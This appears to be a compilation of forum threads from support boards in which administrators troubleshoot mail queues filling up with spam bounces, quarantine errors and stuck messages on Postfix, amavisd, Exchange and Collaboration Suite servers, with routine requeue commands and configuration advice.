    I just checked it recently and found hundreds of messages like this:
    0C8AA2B7E2D6
    9315 Sun Jan  4 09:14:13  [email protected]
    (host 127.0.0.1[127.0.0.1] said: 451 4.5.0 Error in processing, id=76490-02-4, quar+notif FAILED: temporarily unable to quarantine: 451 4.5.0 Local delivery(1) to /Library/Server/Mail/Data/scanner/virusmails failed: Mailbox file /Library/Server/Mail/Data/scanner/virusmails is executable, refuse to deliver at (eval 102) line 219., id=76490-02-4 at /Applications/Server.app/Contents/ServerRoot/usr/bin/amavisd line 15343. (in reply to end of DATA command))
    [email protected]
    I delete them and it fills up again.
    Can anyone please tell me what's happening here and how to fix it?
    Thank a bunch,
    Scott

    Here it is:
    prepress:~ server2$ ls -dl /L*/Server/M*/D*/*/virus*
    -rwxr-x---  1 _amavisd  _amavisd  548758857 Dec 18 10:42 /Library/Server/Mail/Data/scanner/virusmails
    prepress:~ server2$
    Thanks Linc!

  • Mail Queue filling up with DSN failures

    So my Exchange 2010 queue viewer keeps filling up with failed DSNs. There is no sender (except for [email protected]). I have done some searching and the first thing that everyone usually mentions as a cause is SPAM. It's not SPAM.  I know this
    for two reasons:
    1. We have a barracuda SPAM/AV firewall that all SMTP email goes through. None of these emails are there
    2. We can see the subject of the email. The subject is a cronjob email from our linux servers. "Undeliverable Cron <cronuser@>..." But there is no source email to be found. Our linux server is not sending any.
    Any idea what could be causing this?

    If they're DSNs, they could be sent from anywhere with a spoofed reply address.
    Ed Crowley MVP "There are seldom good technological solutions to behavioral problems."

  • Mail Queue Filling Up

    Came into the office this morning and everyone is complaining they didn't get any email over the weekend. I log into SA to notice over 300 emails stuck in the queue. I found a couple threads regarding this and this one particularly is almost my exact situation:
    http://discussions.apple.com/thread.jspa?messageID=1891076&
    With the exception of upgrading the OS. I did actually have to add a virtual IP address to the same NIC that has the IP for our email. I did this because I was having SSL issues:
    http://discussions.apple.com/thread.jspa?threadID=612479&tstart=0
    Since I wasn't adding a new IP and not so much changing an IP, I didn't use the "changeip" command. Following some of the instructions from the above mentioned thread, I ran "sudo postsuper -r ALL" and this didn't seem to help at all. I then issued a "/sbin/reboot" to restart the email server and now it is in the process of sending all the email that are in the queue. Send and receive email is working properly.
    So why the post since I have solved my own problem?
    Because it makes me nervous that after adding an additional real-world IP to the extra NIC installed on the server, that it has been behaving this.
    So... any thoughts or suggestions on how to prevent this in the future or how to fix this? Thanks.

    Ahhh! Yes, I did create an actual user for postmaster
    and am using it so I could have an additional email
    account in Mail.app to monitor email that was
    improperly addressed. Usually I find about 1-2
    emails a week where someone improperly mis-spelled
    someones address and therefore I send it on to the
    right place.
    Should I delete the "postmaster" account in WGM? But
    then how would I be able to check it's email?
    Have a look in /etc/postfix/alias. The alias name is on the left (postmaster) and the name of the mail account used for it is on the right. Replace with your own short name or another (I usually set up a separate mailadmin user). But I don't really think that is causing your problem - its the actual receiving undeliverable mail which is generating the bounces back out.
    Also in /etc/postfix/main.cf what's the difference
    between "myhostname" and "mydomain". I have them
    both configured the same with "mail.domain.com".
    Should one be "domain.com" and the other
    "mail.domain.com"?
    myhostname is normally your hostname ( eg mail.domain.com) - what you want your server to use in its 'helo' command. Ideally should be the same as your MX record (and PTR record for your IP). Ideally they should all match but sometimes difficult.
    mydomain - eg domain.com
    Note that you will have to put the domain into the Local Hosts Alias pane (if not already there) if you previously only had it as your myhostname.
    -david

  • Mail QUEUE keeps filling up 17000+ emails

    I am running a OS 10.4.11 w/latest security updates. Approx 50 active email accounts but a high volume of emails. We have been shut down by our ISP for an open proxy (unsure if this is related or not). We keep getting thousands of emails flooding our mail queue from unknown sources to unknown address. I have read another post with similar issues and I want to update the postfx config to keep this over load of emails from reaching the queue. I am not that great with command line and would like a little help. I have read FRONT-LINE SPAM DEFENSE FOR MAIL SERVERS, and need just a bit of help getting started. ANY help will be appreciated.

    Using text wrangler and editing the main.cf file. I am also looking at the logs and here is what I had on the 31st when we got blocked by our ISP, it looks like just a bunch of spam flooding us with malformed names.
    Aug 31 09:44:04 mail postfix/smtp[4177]: warning: valid_hostname: empty hostname
    Aug 31 09:44:04 mail postfix/smtp[4177]: warning: malformed domain name in resource data of MX record for yaoo.com:
    Aug 31 09:44:05 mail postfix/smtp[3642]: warning: valid_hostname: empty hostname
    Aug 31 09:44:05 mail postfix/smtp[3642]: warning: malformed domain name in resource data of MX record for yuahoo.com:
    Aug 31 09:44:11 mail postfix/smtp[3699]: warning: valid_hostname: empty hostname
    Aug 31 09:44:11 mail postfix/smtp[3699]: warning: malformed domain name in resource data of MX record for yaho.com:
    Aug 31 09:44:13 mail postfix/smtp[3706]: warning: valid_hostname: empty hostname
    Aug 31 09:44:13 mail postfix/smtp[3706]: warning: malformed domain name in resource data of MX record for yahho.com:
    Aug 31 09:44:15 mail postfix/smtp[4167]: warning: valid_hostname: empty hostname
    Aug 31 09:44:15 mail postfix/smtp[4167]: warning: malformed domain name in resource data of MX record for yhaoo.com:
    Aug 31 09:44:15 mail postfix/smtp[4177]: warning: valid_hostname: empty hostname
    Aug 31 09:44:15 mail postfix/smtp[4177]: warning: malformed domain name in resource data of MX record for yhoo.com:
    Aug 31 09:44:21 mail postfix/smtp[3670]: warning: valid_hostname: empty hostname
    Aug 31 09:44:21 mail postfix/smtp[3670]: warning: malformed domain name in resource data of MX record for ahoo.com:
    Aug 31 09:44:21 mail postfix/smtp[3649]: warning: valid_hostname: empty hostname
    Aug 31 09:44:21 mail postfix/smtp[3649]: warning: malformed domain name in resource data of MX record for yahho.com:
    Aug 31 09:44:30 mail postfix/smtp[3669]: warning: valid_hostname: empty hostname
    Aug 31 09:44:30 mail postfix/smtp[3669]: warning: malformed domain name in resource data of MX record for yahooo.com:
    Aug 31 09:44:37 mail postfix/smtp[3669]: warning: valid_hostname: empty hostname
    Aug 31 09:44:37 mail postfix/smtp[3669]: warning: malformed domain name in resource data of MX record for yaho.com:
    Aug 31 09:44:38 mail postfix/smtp[3649]: warning: valid_hostname: empty hostname
    Aug 31 09:44:38 mail postfix/smtp[3649]: warning: malformed domain name in resource data of MX record for yaho.com:
    Aug 31 09:44:39 mail postfix/smtp[3701]: warning: valid_hostname: empty hostname
    Aug 31 09:44:39 mail postfix/smtp[3701]: warning: malformed domain name in resource data of MX record for yaoo.com:
    Aug 31 09:44:43 mail postfix/smtp[3646]: warning: valid_hostname: empty hostname
    Aug 31 09:44:43 mail postfix/smtp[3646]: warning: malformed domain name in resource data of MX record for yhaoo.com:
    Aug 31 09:44:47 mail postfix/smtp[3674]: warning: numeric domain name in resource data of MX record for disinc.com: 127.0.1.50
    Aug 31 09:44:49 mail postfix/smtp[4201]: warning: valid_hostname: empty hostname
    Aug 31 09:44:49 mail postfix/smtp[4201]: warning: malformed domain name in resource data of MX record for ayahoo.com:
    Aug 31 09:44:50 mail postfix/smtp[3655]: warning: valid_hostname: empty hostname
    Aug 31 09:44:50 mail postfix/smtp[3655]: warning: malformed domain name in resource data of MX record for atyahoo.com:
    Aug 31 09:44:51 mail postfix/smtp[1804]: warning: valid_hostname: empty hostname
    Aug 31 09:44:51 mail postfix/smtp[1804]: warning: malformed domain name in resource data of MX record for yahoon.net:
    Aug 31 09:44:52 mail postfix/smtp[1826]: warning: valid_hostname: empty hostname
    Aug 31 09:44:52 mail postfix/smtp[1826]: warning: malformed domain name in resource data of MX record for yaho.com:
    Aug 31 09:44:53 mail postfix/smtp[3701]: warning: valid_hostname: empty hostname
    Aug 31 09:44:53 mail postfix/smtp[3701]: warning: malformed domain name in resource data of MX record for yaho.com:
    Aug 31 09:44:54 mail postfix/smtp[3701]: warning: valid_hostname: empty hostname
    Aug 31 09:44:54 mail postfix/smtp[3701]: warning: malformed domain name in resource data of MX record for yhoo.com:
    Aug 31 09:44:56 mail postfix/smtp[4201]: warning: valid_hostname: empty hostname
    Aug 31 09:44:56 mail postfix/smtp[4201]: warning: malformed domain name in resource data of MX record for hyahoo.com:
    Aug 31 09:44:56 mail postfix/smtp[4197]: warning: valid_hostname: empty hostname
    Aug 31 09:44:56 mail postfix/smtp[4197]: warning: malformed domain name in resource data of MX record for yhoo.com:
    Aug 31 09:44:56 mail postfix/smtp[4196]: warning: valid_hostname: empty hostname
    Aug 31 09:44:56 mail postfix/smtp[4196]: warning: malformed domain name in resource data of MX record for yahooo.com:
    Aug 31 09:44:59 mail postfix/smtp[3646]: warning: valid_hostname: empty hostname
    Aug 31 09:44:59 mail postfix/smtp[3646]: warning: malformed domain name in resource data of MX record for yaoo.com:
    Aug 31 09:45:00 mail postfix/smtp[4197]: warning: valid_hostname: empty hostname
    Aug 31 09:45:00 mail postfix/smtp[4197]: warning: malformed domain name in resource data of MX record for yahho.com:
    Aug 31 09:45:14 mail postfix/smtp[3690]: warning: valid_hostname: empty hostname
    Aug 31 09:45:14 mail postfix/smtp[3690]: warning: malformed domain name in resource data of MX record for yahoo.net:
    Aug 31 09:45:16 mail postfix/smtp[3660]: warning: valid_hostname: empty hostname
    Aug 31 09:45:16 mail postfix/smtp[3660]: warning: malformed domain name in resource data of MX record for yhoo.com:
    Aug 31 09:45:17 mail postfix/smtp[3692]: warning: valid_hostname: empty hostname
    Aug 31 09:45:17 mail postfix/smtp[3692]: warning: malformed domain name in resource data of MX record for yahho.com:
    Aug 31 09:45:18 mail postfix/smtp[3645]: warning: valid_hostname: empty hostname
    Aug 31 09:45:18 mail postfix/smtp[3645]: warning: malformed domain name in resource data of MX record for yhaoo.com:
    Aug 31 09:45:20 mail postfix/smtp[4203]: warning: valid_hostname: empty hostname
    Aug 31 09:45:20 mail postfix/smtp[4203]: warning: malformed domain name in resource data of MX record for yahooomail.com:
    Aug 31 09:45:20 mail postfix/smtp[3649]: warning: valid_hostname: empty hostname
    Aug 31 09:45:20 mail postfix/smtp[3649]: warning: malformed domain name in resource data of MX record for yhaoo.com:
    Aug 31 09:45:24 mail postfix/smtp[3649]: warning: valid_hostname: empty hostname
    Aug 31 09:45:24 mail postfix/smtp[3649]: warning: malformed domain name in resource data of MX record for yahool.com:
    Aug 31 09:45:28 mail postfix/smtp[3649]: warning: valid_hostname: empty hostname
    Aug 31 09:45:28 mail postfix/smtp[3649]: warning: malformed domain name in resource data of MX record for yhaoo.com:
    Aug 31 09:45:28 mail postfix/smtp[3692]: warning: valid_hostname: empty hostname
    Aug 31 09:45:28 mail postfix/smtp[3692]: warning: malformed domain name in resource data of MX record for yahooo.com:
    Aug 31 09:45:35 mail postfix/smtp[3651]: warning: valid_hostname: empty hostname
    Aug 31 09:45:35 mail postfix/smtp[3651]: warning: malformed domain name in

  • Server Admin- Mail queue is this before or after its been checked as spam?

    Hi we have been bombarded with shed loads of junk causing the mail queue to swell and slow down considerably almost to a halt. I have now created the junkmail account and the notjunkmail accounts and now trying to teach the server to sort itself out.
    However in the queue we have MADEUP [email protected] and Im deleting these manually as i cant mark these as junkmail. Will the server once taught, be able to distinguish between the real users and the made up ones?
    Also is what is in the queue is this after the filtering or what will be filtered?
    Thanks Hope this makes sense.
    Oh and if any one knows any great bolt on gui spam filters for mac server 10.4 id appreciate your advice... Thanks

    Sieve scripting is built in.
    Example vacation email script, forwarding and junk-mail processing are included in the Command Line manual.
    Some URLs...
    http://www.ietf.org/rfc/rfc3028.txt
    http://nfs-uxsup.csx.cam.ac.uk/~fanf2/hermes/doc/sieve/
    As for Postfix:
    http://www.stepwise.com/Articles/Workbench/eart.index.html
    http://www.cutedgesystems.com/software/PostfixEnabler/

  • What to do with mail stuck in mail queue?

    I think i have my web and e-mail server running fine, all mail from the users is coming and going as should. But I have to delete the mail queue every two days or so because it is filling up with junk mail to unknown senders and users. I think everting is setup correct and I do not have an open relay, but is there some way I can have it delete the junk mail in this queue by itself?

    Most likely you have postfix configured to accept any mail. Being for known or unknown users. Thus, mail for unknown users (mostly spam) gets only bounced at a later stage (cyrus/IMAP), which in turn creates those pesky Mailer-Daemon messages in your queue.
    Being spam, there is usually no proper return address, so those messages stay in your queue, until they expire after 5 days (default value).
    See my tutorial on how to improve Postfix' configuration here: http://osx.topicdesk.com/content/view/38/62/

  • How  to look at mail queue

    I have installed Collaboration Suite 9.0.3, and am curious to know how to look at the mail queue on the OCS server, and more specifically, how do I delete emails in the queue? Somebody apparently found us during the installation of this server before I could lock it down with spam rules, and I have a ton of junk emails stuck in the queue that won't go anywhere. How do I get rid of those messages? They are literally using up the server resources after about 5 hours of the server trying to send them.
    Thanks,
    Michael

    Well, I guess that's part of the problem too. I'm not sure I have emails in the queue. I have the OCS server set up with the relay host set to another server on the network running sendmail. If I stop the smtp_out service on the OCS server, and then start it again, I see a bunch of messages being sent to the relay server to be delivered, most of them spam as far as I can tell. The sendmail server is set to reject those messages, so it does not try to deliver them and therefore does not put them in the queue on that server. However, regardless of restarting smtp_out, restarting Unified Messaging, restarting OCS, or restarting the entire server, those messages continue to remain in what I'm assuming is the queue on the OCS server. Does that make any sense? From what I can get from the documentation, they must be sitting in the mailstore database somewhere, and I'm wondering if there is a query I can run to at least look and see what is there, and preferable delete them. Otherwise, I guess I have to wait 5 days for the server to finally give up.
    Any ideas?
    Thanks,
    Michael

  • Server Admin only shows 201 messages in Mail Queue

    This issue has been haunting me since 10.5.0 and I can't seem to get rid of it. It's not crucial, but very obnoxious. In Server Admin (from multiple computers) the mail queue will only show a maximum of 201 messages. If there are more than that I have a cryptic "message" at the end of the list that has a message ID of "FFFFFFFFFFFF" and the Recipients Field has [...]
    I would love to be able to see all the messages in my queue if possible, but haven't found anywhere to fix this.
    Any help would be very appreciated.

    Thanks Alex. We aren't bouncing spam on our mail server, but I do notice that a lot of the mail is from MAILER-DAEMON. I'm assuming it's "User not Found" messages from hosts that don't really exist. I've tweaked the server using some suggestions from osx.topicdesk.com to clear some of those out, but it hasn't been 100% effective.
    I think part of the issue is that the server is a dual G4 Xserve and is scanning junk mail on all messages. I assume that those two factors contribute to the backup of mail in the queue.
    As for volume of mail, we receive 100k a month.

  • Stuck in the Mail Queue

    We lost our internet connection yesterday for over 12 hours. It is back on now and the mailserver is working fine BUT...
    a) Nothing has arrived from the time we were out ie: I have everything prior to the lost connection and everything since, but nothing from the lost 12 hours. It is like it never existed!
    b) I have a group in emails that are stuck fast in the mailserver queue (Server Admin, Mail, Maintenance, Mail Queue). I can delete some that I know to be spam but when I click 'Retry' nothing happens
    Any ideas?
    (Server 10.5.2)

    Open terminal and issue:
    sudo postsuper -r ALL
    (Give it time and don't force the queue continuously. If it doesn't start sending after a few minutes, check /var/log/mail.log for clues)

  • Mail stuck in the Mail Queue

    For reasons I have not yet understood, my 10.5.2 mailserver stopped delivering mail. After a few restarts it is now running again but;
    All the mail that arrived while it was stopped is now stuck in the Mail Queue. How can I get it to deliver thisstuck mail?

    pterobyte wrote:
    If they can't get to the content filter on the first try, maybe it's overloaded? How busy is your machine?
    It's a new installation of Leopard Server on an internal drive, the CPU navigate from 0 to 20% so it's not here. I used spamtrainer to import the database from the old drive (Tiger Server) and the mail store is on a RAID disk so I just had to change the default mail location in the right pane. I just restarted the server on the Tiger Server disk and everything is fine there.
    Requeuing does not start the content filter, so if it were off, it'd still be off. So since it is running, it look like it can't keep up.
    Sorry, I do my best to be understandable :->
    I just made tries to see if mails would be delivered once the spam and virus filter is off and saw that mails were not delivered at all.
    Is this the normal behavior ?
    This problem of the content filter is probably linked to what I said in another thread.
    I cannot uncheck "Attach subject tag" in Server Admin. If I uncheck the spam filter and virus filter then mails are not delivered too.
    I doubt it is linked (unless you "play" with Server Admin while troubleshooting the queue). As I mentioned above, amavisd, doesn't run just "a bit".
    You can always change the amavisd and postfix settings yourself.
    If I knew what to change and where I probably would do it :->
    I'm just scared about how many things don't work as expected once Leopard Server is installed.
    Lot of problems with SMB too and as we have only one machine here I must reboot the server on Tiger if I don't want everybody here to kill me :->>
    Maybe some files cannot be read/write...
    If it was a permission issue, requeued mail would still hit the same issues.
    Yes... I thought about that.
    Do you think that it could help to download the 10.5.2 combo update and to reinstall it ?
    Doubt it, but it probably won't hurt.
    Will try it as soon as I can reboot the server on Leopard. I seems that someone will not leave the office like others will do today
    Thanks for your help.

  • Huge Mail Queue

    Somebody please help me!!!!
    I recently realised that the mail server part of OSX server was switched on without being configured correctly and as a result someone was relaying spam through it.
    I know virtually nothing about Terminal but have managed to delete the mail.log's which were nearly 1gb and the mailaccess.log but they have started to grow again even though mail is now off!
    If i try to view the Mail Queue in server admin it grinds to a halt so i am guessing that i must have a huge backlog of messages in the queue. Is there an easy way of clearing the queue without using server admin?
    Thanks,
    Mark

    After you take care of the immediate issue....
    I would try and find out how the mail server was enabled.
    You could have an intruder who is using your machine for their own prupose.
    Do you have port 22 (SSH) open to the outside world?
    You might want to check your logs, especially /var/log/secure.log
    Jeff

Maybe you are looking for